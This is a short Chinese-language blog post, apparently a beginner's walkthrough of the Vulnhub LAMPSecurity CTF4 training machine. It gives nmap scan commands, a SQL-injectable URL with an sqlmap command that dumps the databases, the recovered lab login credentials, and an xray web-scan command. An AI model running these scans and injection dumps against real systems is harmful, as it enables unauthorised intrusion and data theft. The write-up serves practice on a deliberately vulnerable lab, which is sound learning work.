vulnhub-cft4靶场 - FreeBuf网络安全行业门户

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序把安全装进口袋

vulnhub-cft4靶场

2021-07-22 17:37:38

Vulnhub-ctf4

下载地址:https://www.vulnhub.com/entry/lampsecurity-ctf4,83/

一个小白，刚开始接触CTF，记录一下靶机。欢迎大佬们指正（轻喷TAT）

由于是安装在虚拟机上的，所以先用nmap扫描网段获取虚拟机IP地址

物理机网段：192.168.11.0/24

nmap 192.168.11.0/24

找到ip：

扫描一下开放的端口：

nmap -A -sV 192.168.11.139

开放了22、25、80端口：

先查看80端口：

访问 192.168.11.139

手工在各个页面上寻找注入点

找到注入的页面：

http://192.168.11.139/index.html?page=blog&title=Blog&id=2

sqlmap一把嗦

先获取database的信息：

sqlmap -u "http://192.168.11.139/index.html?page=blog&title=Blog&id=2" --dbs --dump --batch

直接就出来了，芜湖起飞

尝试用ssh登录，但是靶机ssh版本太低报错了，所以直接从虚拟机登录

achen：seventysixers

尝试提权：

直接root

直接上xray：

xray.exe webscan --basic-crawler http://192.168.11.139/index.html?page=blog&title=Blog&id=%E2%80%98%E2%80%99

剩下就是利用漏洞了

# CTF # 靶场实战

本文为独立观点，未经允许不得转载，授权请联系FreeBuf客服小蜜蜂，微信：freebee2022

被以下专辑收录，发现更多精彩内容

+ 收入我的专辑

+ 加入我的收藏

展开更多